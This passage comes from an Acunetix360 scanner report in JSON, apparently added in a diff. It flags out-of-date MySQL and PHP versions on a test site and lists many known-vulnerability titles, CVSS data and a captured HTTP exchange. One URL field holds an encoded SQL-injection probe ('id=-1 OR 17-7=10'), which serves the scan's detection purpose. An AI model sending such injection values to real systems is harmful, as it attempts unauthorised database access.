+ { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Critical", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Critical", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Improper Neutralization of Special Elements used in a Command ('Command Injection') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL NULL Pointer Dereference Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL NULL Pointer Dereference Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Out-of-bounds Write Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Improper Privilege Management Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Improper Access Control Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + } + ], + "LastSeenDate": "25/06/2021 01:54 AM", + "Name": "Out-of-date Version (MySQL)", + "ProofOfConcept": "", + "RemedialActions": "", + "RemedialProcedure": "
    Please upgrade your installation of MySQL to the latest stable version.
    ", + "RemedyReferences": "", + "Severity": "Critical", + "State": "Revived", + "Type": "MySqlOutOfDate", + "Url": "http://php.testsparker.com/artist.php?id=-1%20OR%2017-7%3d10" + }, + { + "Certainty": 90, + "Classification": { + "Iso27001": "A.14.1.2", + "Capec": "310", + "Cvss": { + "BaseScore": { + "Severity": 2, + "Type": "Base", + "Value": "5.3" + }, + "EnvironmentalScore": { + "Severity": 2, + "Type": "Environmental", + "Value": "5.1" + }, + "TemporalScore": { + "Severity": 2, + "Type": "Temporal", + "Value": "5.1" + }, + "Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N/E:H/RL:O/RC:C" + }, + "Cvss31": null, + "Cwe": "829", + "Hipaa": "164.308(a)(1)(i)", + "Owasp": "A9", + "OwaspProactiveControls": "C1", + "Pci32": "6.2", + "Wasc": "" + }, + "Confirmed": false, + "Description": "

    Acunetix360 identified you are using an out-of-date version of PHP.

    ", + "ExploitationSkills": "", + "ExternalReferences": "", + "ExtraInformation": [ + { + "Name": "Identified Version", + "Value": "5.2.6" + }, + { + "Name": "Latest Version", + "Value": "8.0.7" + }, + { + "Name": "Vulnerability Database", + "Value": "Result is based on 06/18/2021 12:00:00 vulnerability database content." + }, + { + "Name": "Page Type", + "Value": "Other" + } + ], + "FirstSeenDate": "15/06/2021 01:44 PM", + "HttpRequest": { + "Content": "GET / HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Acunetix360\r\n\r\n", + "Method": "GET", + "Parameters": [] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Length: 136\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:49:09 GMT\r\n\r\n\n\n\n\n", + "Duration": 45.9707, + "StatusCode": 200 + }, + "LookupId": "df809200-a510-4daf-8722-ad48024dd66f", + "Impact": "
    Since this is an old version of the software, it may be vulnerable to attacks.
    ", + "KnownVulnerabilities": [ + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Use of Externally-Controlled Format String Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Link Resolution Before File Access ('Link Following') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Use of Externally-Controlled Format String Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper 